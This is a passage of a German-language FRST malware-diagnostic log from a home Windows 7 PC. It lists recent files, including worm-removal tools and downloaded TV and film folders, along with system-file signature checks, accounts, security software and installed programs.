2016-04-09 18:24 - 2011-06-26 08:45 - 00256000 _____ C:\Windows\PEV.exe
2016-04-09 18:24 - 2010-11-07 19:20 - 00208896 _____ C:\Windows\MBR.exe
2016-04-09 18:24 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2016-04-09 18:24 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2016-04-09 18:24 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2016-04-09 18:24 - 2000-08-31 02:00 - 00098816 _____ C:\Windows\sed.exe
2016-04-09 18:24 - 2000-08-31 02:00 - 00080412 _____ C:\Windows\grep.exe
2016-04-09 18:24 - 2000-08-31 02:00 - 00068096 _____ C:\Windows\zip.exe
2016-04-09 18:20 - 2016-04-09 18:20 - 05660031 ____R (Swearware) C:\Users\Ben\Desktop\ComboFix.exe
2016-04-09 18:18 - 2016-04-09 18:18 - 00000000 ____D C:\Rem-VBSqt
2016-04-09 18:17 - 2016-04-09 18:17 - 00000000 ____D C:\ProgramData\Panda Security
2016-04-09 18:16 - 2016-04-09 18:16 - 00003108 _____ C:\Windows\System32\Tasks\PandaUSBVaccine
2016-04-09 18:16 - 2016-04-09 18:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Panda Security
2016-04-09 18:16 - 2016-04-09 18:16 - 00000000 ____D C:\Program Files (x86)\Panda USB Vaccine
2016-04-09 18:15 - 2016-04-09 18:15 - 00848856 _____ (Panda Security ) C:\Users\Ben\Desktop\USBVaccineSetup.exe
2016-04-09 18:14 - 2016-04-09 18:14 - 00110592 _____ (bartblaze) C:\Users\Ben\Desktop\Rem-VBSworm.exe
2016-04-09 17:40 - 2016-04-09 19:21 - 00018024 _____ C:\Users\Ben\Desktop\FRST.txt
2016-04-09 17:40 - 2016-04-09 17:40 - 00047360 _____ C:\Users\Ben\Desktop\Addition.txt
2016-04-09 17:37 - 2016-04-09 17:39 - 00047362 _____ C:\Users\Ben\Downloads\Addition.txt
2016-04-09 17:36 - 2016-04-09 19:21 - 00000000 ____D C:\FRST
2016-04-09 17:36 - 2016-04-09 17:39 - 00033078 _____ C:\Users\Ben\Downloads\FRST.txt
2016-04-09 17:36 - 2016-04-09 17:36 - 02374144 _____ (Farbar) C:\Users\Ben\Desktop\FRST64.exe
2016-04-09 15:57 - 2016-04-09 15:57 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Ben\Downloads\revosetup95.exe
2016-04-09 15:57 - 2016-04-09 15:57 - 00000000 ____D C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2016-04-09 15:57 - 2016-04-09 15:57 - 00000000 ____D C:\Program Files (x86)\VS Revo Group
2016-04-09 15:15 - 2016-04-09 15:15 - 03119168 _____ C:\Users\Ben\Downloads\adwcleaner_5.109.exe
2016-04-09 13:53 - 2016-04-09 13:53 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-04-08 19:36 - 2016-04-08 19:59 - 00000000 ____D C:\Users\Ben\Downloads\The Big Bang Theory S09E20 1080p HDTV X264-DIMENSION
2016-04-05 21:52 - 2016-04-05 23:52 - 00000000 ____D C:\Users\Ben\Downloads\Shameless US S06E12 1080p HDTV X264-DIMENSION
2016-04-04 22:19 - 2016-04-04 23:28 - 00000000 ____D C:\Users\Ben\Downloads\The Walking Dead S06E16 1080p WEB-DL DD5 1 H 264-Cyphanix
2016-04-02 09:47 - 2016-04-07 00:13 - 00000000 ____D C:\Users\Ben\Downloads\plntaps201472yfy
2016-04-02 09:46 - 2016-04-07 00:14 - 00000000 ____D C:\Users\Ben\Downloads\plantaps201172yfy
2016-04-02 09:45 - 2016-04-07 00:14 - 00000000 ____D C:\Users\Ben\Downloads\plntaps200172yfy
2016-04-02 09:44 - 2016-04-07 00:14 - 00000000 ____D C:\Users\Ben\Downloads\plntaps197372yfy
2016-04-02 09:43 - 2016-04-07 00:14 - 00000000 ____D C:\Users\Ben\Downloads\plntaps197272yfy
2016-04-02 09:42 - 2016-04-07 00:14 - 00000000 ____D C:\Users\Ben\Downloads\plntaps197172yfy
2016-04-02 05:24 - 2016-04-07 00:14 - 00000000 ____D C:\Users\Ben\Downloads\plntaps1970720yfy
2016-04-01 23:30 - 2016-04-07 00:14 - 00000000 ____D C:\Users\Ben\Downloads\plntaps196872yfy
2016-04-01 19:49 - 2016-04-01 20:21 - 00000000 ____D C:\Users\Ben\Downloads\The Big Bang Theory S09E19 1080p HDTV X264-DIMENSION
2016-03-30 23:40 - 2016-03-31 01:32 - 00000000 ____D C:\Users\Ben\Downloads\New Girl S05E13 1080p WEB-DL DD5 1 H 264-NTb
2016-03-30 23:15 - 2016-03-30 23:16 - 00000000 ____D C:\Users\Ben\Downloads\01 Khavn featuring Bing Austria - Ruined Heart
2016-03-29 01:25 - 2016-03-29 02:14 - 00000000 ____D C:\Users\Ben\Downloads\Shameless US S06E11 1080p HDTV X264-DIMENSION
2016-03-28 23:49 - 2016-03-29 00:53 - 00000000 ____D C:\Users\Ben\Downloads\The Walking Dead S06E15 1080p HDTV x264-CRAVERS
2016-03-27 23:15 - 2016-04-05 20:03 - 00000000 ____D C:\Users\Ben\Downloads\Hazel O'Connor - Breaking Glass
2016-03-26 02:58 - 2016-03-26 07:40 - 00000000 ____D C:\Users\Ben\Downloads\The Hateful Eight 2015 1080p BluRay x264-SPARKS
2016-03-24 22:58 - 2016-03-25 00:53 - 00000000 ____D C:\Users\Ben\Downloads\The Lobster 2015 720p BRRip X264 AC3-PLAYNOW
2016-03-24 00:25 - 2016-03-24 00:34 - 00000000 ____D C:\Users\Ben\Downloads\New Girl S05E12 720p HDTV x264-FLEET
2016-03-21 22:43 - 2016-03-22 02:01 - 00000000 ____D C:\Users\Ben\Downloads\Shameless US S06E10 1080p HDTV X264-DIMENSION
2016-03-21 21:43 - 2016-03-22 00:32 - 00000000 ____D C:\Users\Ben\Downloads\The Walking Dead S06E14 1080p HDTV X264-DIMENSION
2016-03-21 21:43 - 2016-03-21 21:43 - 00000000 ____D C:\Users\Ben\Downloads\Workaholics S06E08 The Fabulous Murphy Sisters 1080p WEB-DL AAC2 0 H 264-BTN
2016-03-18 21:55 - 2016-03-19 00:23 - 00000000 ____D C:\Users\Ben\Downloads\The Hunger Games Mockingjay Part 2 2015 720p BRRip X264 AC3-PLAYNOW
2016-03-18 18:05 - 2016-03-18 18:27 - 00000000 ____D C:\Users\Ben\Downloads\Workaholics S06E10 720p HDTV x264-KILLERS
2016-03-18 17:28 - 2016-03-18 18:05 - 00000000 ____D C:\Users\Ben\Downloads\How to Get Away with Murder S02E15 720p HDTV X264-DIMENSION
2016-03-18 01:56 - 2016-03-18 02:07 - 00000000 ____D C:\Users\Ben\Downloads\It s Always Sunny in Philadelphia S11E10 The Gang Goes to Hell Part Two 1080p WEB DL AAC2 0 H 264
2016-03-17 01:13 - 2016-03-17 01:36 - 00000000 ____D C:\Users\Ben\Downloads\New Girl S05E11 720p HDTV x264-AVS
2016-03-16 01:21 - 2016-03-17 02:09 - 00000000 ____D C:\Users\Ben\Downloads\I A S P 1109 720p NewAge
2016-03-15 23:17 - 2016-03-15 23:25 - 00000000 ____D C:\Users\Ben\Downloads\Family Guy S14E16 720p HDTV x264-AVS
2016-03-15 00:16 - 2016-03-15 23:16 - 00000000 ____D C:\Users\Ben\Downloads\The Walking Dead S06E13 1080p HDTV X264-DIMENSION
2016-03-14 22:45 - 2016-03-14 23:58 - 00000000 ____D C:\Users\Ben\Downloads\Shameless US S06E09 1080p HDTV X264-DIMENSION
2016-03-13 22:14 - 2016-03-14 01:18 - 00000000 ____D C:\Users\Ben\Downloads\WBB ThHungerGmesMockingjayP1 108BlRy
2016-03-13 06:58 - 2016-03-16 01:21 - 00000000 ____D C:\Users\Ben\Downloads\I A S P 1108 720p NewAGe
2016-03-11 22:02 - 2016-03-11 22:41 - 00000000 ____D C:\Users\Ben\Downloads\How to Get Away with Murder S02E14 720p HDTV X264-DIMENSION
2016-03-11 21:22 - 2016-03-11 22:15 - 00000000 ____D C:\Users\Ben\Downloads\The Big Bang Theory S09E18 1080p HDTV X264-DIMENSION
2016-03-11 19:16 - 2016-03-11 19:41 - 00000000 ____D C:\Users\Ben\Downloads\Workaholics S06E09 720p HDTV x264-FLEET
2016-03-10 20:59 - 2016-03-10 21:26 - 00000000 ____D C:\Users\Ben\Downloads\New Girl S05E10 1080p WEB DL DD5 1 H 264

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-09 18:49 - 2009-07-14 04:34 - 00000215 _____ C:\Windows\system.ini
2016-04-09 18:45 - 2009-07-14 06:45 - 00021808 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-04-09 18:45 - 2009-07-14 06:45 - 00021808 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-04-09 18:35 - 2015-09-03 16:00 - 00000000 ____D C:\Program Files (x86)\Steam
2016-04-09 18:35 - 2012-02-20 13:38 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-09 18:33 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-04-09 18:26 - 2012-07-31 16:12 - 00001112 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1744302370-2936264581-3152195107-1000UA.job
2016-04-09 18:25 - 2012-02-20 13:38 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-09 16:58 - 2015-07-26 18:00 - 04952336 _____ (Advanced Micro Devices, Inc.) C:\Users\Ben\Downloads\autodetectutility.exe
2016-04-09 16:22 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\ModemLogs
2016-04-09 16:07 - 2015-07-27 16:21 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-04-09 16:05 - 2015-07-27 16:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 
2016-04-09 16:05 - 2015-07-27 16:20 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 
2016-04-09 15:59 - 2009-07-14 07:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-04-09 15:51 - 2011-04-12 09:43 - 00699432 _____ C:\Windows\system32\perfh007.dat
2016-04-09 15:51 - 2011-04-12 09:43 - 00149572 _____ C:\Windows\system32\perfc007.dat
2016-04-09 15:51 - 2009-07-14 07:13 - 01620684 _____ C:\Windows\system32\PerfStringBackup.INI
2016-04-09 15:51 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\inf
2016-04-09 15:19 - 2012-03-23 06:57 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-04-09 15:17 - 2016-03-06 20:51 - 00000000 ____D C:\AdwCleaner
2016-04-09 15:14 - 2015-07-26 04:52 - 00000619 _____ C:\Users\Ben\Desktop\serien.txt
2016-04-09 15:14 - 2015-07-26 03:23 - 00000000 ____D C:\Users\Ben\AppData\Local\JDownloader v2.0
2016-04-09 15:13 - 2012-02-08 22:36 - 00000000 ____D C:\Users\Ben\AppData\Roaming\vlc
2016-04-09 00:34 - 2012-07-31 16:12 - 00001060 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1744302370-2936264581-3152195107-1000Core.job
2016-04-01 16:46 - 2013-03-05 01:50 - 00207872 ___SH C:\Users\Ben\Downloads\Thumbs.db
2016-03-30 22:27 - 2012-07-31 16:13 - 00002353 _____ C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-03-21 03:24 - 2015-07-26 03:52 - 00000000 ____D C:\ProgramData\Package Cache
2016-03-21 03:24 - 2013-05-20 00:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2016-03-11 21:52 - 2013-05-20 00:28 - 00154816 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avgntflt.sys
2016-03-11 21:52 - 2013-05-20 00:28 - 00133168 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avipbb.sys
2016-03-11 21:52 - 2013-05-20 00:28 - 00069888 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avnetflt.sys
2016-03-10 14:09 - 2015-07-27 16:20 - 00064896 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-03-10 14:08 - 2015-07-27 16:20 - 00140672 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-03-10 14:08 - 2015-07-27 16:20 - 00027008 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-03-10 01:26 - 2016-03-09 20:35 - 00000000 ____D C:\Users\Ben\Downloads\Bl ack Fla g-Ro lli nBan d-Di cog rap hy

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2005-04-21 14:53 - 2005-04-21 14:53 - 0143210 _____ () C:\Program Files (x86)\Bitte zuerst lesen.html
2005-04-13 10:10 - 2005-04-13 10:10 - 0036092 _____ () C:\Program Files (x86)\How to Uninstall.pdf
2005-03-08 08:41 - 2005-03-08 08:41 - 0016118 _____ () C:\Program Files (x86)\Installationsanleitung.html
2012-02-08 21:57 - 2012-02-08 21:57 - 0000003 _____ () C:\Users\Ben\AppData\Local\user_data.ini
2013-01-05 16:42 - 2013-01-05 16:42 - 0017408 _____ () C:\Users\Ben\AppData\Local\WebpageIcons.db

==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-02-08 16:26

==================== Ende von FRST.txt ============================

Code:

ATTFilter

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
durchgeführt von Ben (2016-04-09 19:21:29)
Gestartet von C:\Users\Ben\Desktop
Windows 7 Professional Service Pack 1 (X64) (2012-02-08 19:48:30)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-1744302370-2936264581-3152195107-500 - Administrator - Disabled)
Ben (S-1-5-21-1744302370-2936264581-3152195107-1000 - Administrator - Enabled) => C:\Users\Ben
Gast (S-1-5-21-1744302370-2936264581-3152195107-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1744302370-2936264581-3152195107-1005 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Avira Antivirus (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AS: Avira Antivirus (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

7-PDF Split & Merge Version 2.5.0 (Build 168) (HKLM-x32\...\7-PDF Split & Merge_is1) (Version: 7-PDF Split & Merge - Version 2.5.0 (Build 168) - 7-PDF, Germany - Thorsten Hodes)
Acrobat.com (HKLM-x32\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1.377 - Adobe Systems Incorporated)
Acrobat.com (x32 Version: 0.0.0 - Adobe Systems Incorporated) Hidden
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 15.010.20060 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.7.0.19480 - Adobe Systems Incorporated)
Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.4.980 - Adobe Systems Incorporated.)
Adobe Creative Suite 2 (HKLM-x32\...\{0134A1A1-C283-4A47-91A1-92F19F960372}) (Version:  - )
Adobe Download Assistant (HKLM-x32\...\com.adobe.downloadassistant.AdobeDownloadAssistant) (Version: 1.2 - Adobe Systems Incorporated)
AMD Catalyst Install Manager (HKLM\...\{F37078EA-4B6A-1D6F-6FED-3EDF2117B42C}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
AP Tuner 3.08 (HKLM-x32\...\AP Tuner 3.08) (Version:  - )
Apple Application Support (HKLM-x32\...\{EB879750-CCBD-4013-BFD5-0294D4DA5BD0}) (Version: 2.1.7 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{B8AD779A-82DA-4365-A7D0-AD3DCFC55CFF}) (Version: 5.1.1.4 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ASRock App Charger v1.0.5 (HKLM\...\ASRock App Charger_is1) (Version:  - ASRock Inc.)
ASRock eXtreme Tuner v0.1.122 (HKLM-x32\...\ASRock eXtreme Tuner_is1) (Version:  - )
ASRock InstantBoot v1.29 (HKLM-x32\...\ASRock InstantBoot_is1) (Version:  - )
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.16.282 - Avira Operations GmbH & Co. KG)
Avira Launcher (HKLM-x32\...\{3b87484e-d70b-4b4f-ad59-2ae89571e2cf}) (Version: 1.1.56.9119 - Avira Operations GmbH & Co. KG)
Avira Launcher (x32 Version: 1.1.56.9119 - Avira Operations GmbH & Co. KG) Hidden
Call of Duty(R) - World at War(TM) (HKLM-x32\...\InstallShield_{D80A6A73-E58A-4673-AFF5-F12D7110661F}) (Version: 1.1 - Activision)
Call of Duty(R) - World at War(TM) (x32 Version: 1.0 - Activision) Hidden
Call of Duty(R) - World at War(TM) 1.1 Patch (x32 Version:  - ) Hidden
Call of Duty(R) - World at War(TM) 1.1 Patch (x32 Version: 1.1 - Activision) Hidden
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.4.0.2971 - CDBurnerXP)
Cisco AnyConnect Secure Mobility Client  (HKLM-x32\...\Cisco AnyConnect Secure Mobility Client) (Version: 3.0.11042 - Cisco Systems, Inc.)
Cisco AnyConnect Secure Mobility Client (x32 Version: 3.0.11042 - Cisco Systems, Inc.) Hidden
Crysis(R) (HKLM-x32\...\{000E79B7-E725-4F01-870A-C12942B7F8E4}) (Version: 1.20.0000 - Electronic Arts)
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.47.1.0333 - Disc Soft Ltd)
DivX-Setup (HKLM-x32\...\DivX Setup) (Version: 2.6.1.5 - DivX, LLC)
Etron USB3.0 Host Controller (x32 Version: 0.104 - Etron Technology) Hidden
Fallout 4 (HKLM-x32\...\Fallout 4_is1) (Version:  - )
Fallout New Vegas (HKLM-x32\...\Fallout New Vegas_is1) (Version:  - )
FIFA 11 (HKLM-x32\...\{3FEA6CD1-EA13-4CE7-A74E-A74A4A0A7B5C}) (Version: 1.0.0.0 - Electronic Arts)
Free Audio CD Burner version 1.5.5.221 (HKLM-x32\...\Free Audio CD Burner_is1) (Version: 1.5.5.221 - DVDVideoSoft Ltd.)
FreeOCR v5.4 (HKLM-x32\...\freeocr_is1) (Version:  - )
Google Chrome (HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\...\Google Chrome) (Version: 49.0.2623.110 - Google Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Grand Theft Auto Vice City (HKLM-x32\...\{4B35F00C-E63D-40DC-9839-DF15A33EAC46}) (Version: 1.00.000 - )
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Keep Talking and Nobody Explodes v1.0.1 version 1.0.1 (HKLM-x32\...\Keep Talking and Nobody Explodes v1.0.1_is1) (Version: 1.0.1 - WaLMaRT)
League of Legends (HKLM-x32\...\{918A9082-6287-4D25-9002-5E5D5E4971CB}) (Version: 1.02.0000 - Riot Games)
Left 4 Dead (HKLM-x32\...\Steam App 500) (Version:  - Valve)
Malwarebytes Anti-Malware Version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{6AFCA4E1-9B78-3640-8F72-A7BF33448200}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mozilla Firefox 46.0 (x86 de) (HKLM-x32\...\Mozilla Firefox 46.0 (x86 de)) (Version: 46.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 46.0.0.5941 - Mozilla)
Need for Speed Underground 2 (HKLM-x32\...\{909F8EBC-EC7F-48FF-0085-475D818F0F31}) (Version:  - )
OpenOffice.org 3.3 (HKLM-x32\...\{4286716B-1287-48E7-9078-3DC8248DBA96}) (Version: 3.3.9567 - OpenOffice.org)
Panda USB Vaccine 1.0.1.4 (HKLM-x32\...\{55A41219-9B22-4098-BAE7-AE289B3C569A}_is1) (Version:  - Panda Security)
PDF Split And Merge Basic (HKLM\...\{9A40D2F8-9458-458B-95E3-B57797C574E1}) (Version: 2.2.3 - Andrea Vacondio)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.6.0 - Frank Heindörfer, Philip Chinery)
Portal (HKLM-x32\...\Steam App 400) (Version:  - Valve)
Portal 2 (HKLM-x32\...\Steam App 620) (Version:  - Valve)
RAR Repair Tool v.4.0.1 (HKLM-x32\...\RAR Repair Tool_is1) (Version:  - ZRT Labs)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.44.421.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6378 - Realtek Semiconductor Corp.)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 4.6 - Samsung Electronics)
Secure Download Manager (HKLM-x32\...\{6E839820-0BBA-4310-9D06-4463BAEA6641}) (Version: 3.1.01 - Kivuto Solutions Inc.)
Skype™ 7.7 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.7.103 - Skype Technologies S.A.)
SpeedRunners (HKLM-x32\...\Steam App 207140) (Version:  - DoubleDutch Games)
SpeedRunners Beta r29 (HKLM-x32\...\SpeedRunners_is1) (Version:  - )
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Suite Specific (x32 Version: 2.0.0 - Adobe Systems, Incorporated) Hidden
The Forest Alpha 0.21c / RePack by MarkusEVO (HKLM-x32\...\{F70A80C7-5194-FOREST-A6E5-BB68B89D566C}_is1) (Version: Alpha 0.21c - )
The Jackbox Party Pack (HKLM-x32\...\Steam App 331670) (Version:  - Jackbox Games, Inc.)
THX TruStudio (HKLM-x32\...\{AFB907F5-C0E6-4753-8284-DE955EF86AC2}) (Version: 1.00.01 - Creative Technology Limited)
TL-WN751ND Driver (HKLM-x32\...\{14770694-6C1C-4137-95F9-6F934D8491B4}) (Version: 1.00.0000 - TP-LINK)
TrueCrypt (HKLM-x32\...\TrueCrypt) (Version: 7.1a - TrueCrypt Foundation)
UltraStar 1.0.2 (HKLM-x32\...\UltraStar) (Version: 1.0.2 - SterGames)
UltraStar Deluxe (HKLM-x32\...\UltraStar Deluxe) (Version: 1.1 - USDX Team)
Unity Web Player (HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\...\UnityWebPlayer) (Version: 5.0.3f2 - Unity Technologies ApS)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Windows 7 USB/DVD Download Tool (HKLM-x32\...\{CCF298AF-9CE1-4B26-B251-486E98A34789}) (Version: 1.0.30 - Microsoft Corporation)
WinRAR 5.30 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
Wondershare DVD Creator(Build 3.3.0) (HKLM-x32\...\Wondershare DVD Creator_is1) (Version:  - Wondershare Software)
World of Goo Version 1.3 (HKLM-x32\...\{8267B856-EB48-4BA4-B89C-972751BEC7B1}_is1) (Version: 1.3 - 2D BOY)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1744302370-2936264581-3152195107-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Ben\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-1744302370-2936264581-3152195107-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Ben\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-1744302370-2936264581-3152195107-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Ben\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1744302370-2936264581-3152195107-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Ben\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-1744302370-2936264581-3152195107-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Ben\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => Keine Datei
